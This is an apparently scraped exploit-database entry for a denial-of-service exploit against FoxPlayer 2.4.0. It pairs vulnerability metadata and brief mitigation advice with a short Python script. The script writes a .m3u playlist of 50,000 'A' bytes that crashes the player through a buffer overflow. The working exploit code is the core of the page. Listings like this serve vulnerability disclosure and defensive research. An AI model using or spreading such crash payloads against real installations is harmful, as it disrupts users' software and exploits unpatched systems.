header-logo
Suggest Exploit
vendor:
FoxPlayer
by:
Oh Yaw Theng
7.5
CVSS
HIGH
Denial of Service
CWE
Product Name: FoxPlayer
Affected Version From: 2.4.2000
Affected Version To: 2.4.2000
Patch Exists: NO
Related CWE:
CPE: a:foxmediatools:foxplayer:2.4.0
Metasploit:
Other Scripts:
Platforms Tested: Windows XP SP2
2010

FoxPlayer 2.4.0 (.m3u) Denial of Service

This exploit targets FoxPlayer version 2.4.0 by sending a specially crafted .m3u file. It causes the application to crash due to a buffer overflow vulnerability.

Mitigation:

Update to a patched version of FoxPlayer or use an alternative media player.
Source

Exploit-DB raw data:

# Exploit Title: FoxPlayer 2.4.0 (.m3u) Denial of Service
# Date: 30 / 11 / 2010
# Author: Oh Yaw Theng
# Software Link: http://www.foxmediatools.com/installers/fox-player-setup.exe
# Version: v2.4.0
# Tested on: Windows XP SP 2
# CVE : N / A
# Description : This is the latest version of FoxPlayer from the official website.. The version is v2.4.0

#!/usr/bin/python

filename = "crash.m3u"

junk = "\x41" * 50000

exploit = junk

textfile = open(filename,'w')
textfile.write(exploit)
textfile.close()

Navigation

Suggest Exploit

Services By CQR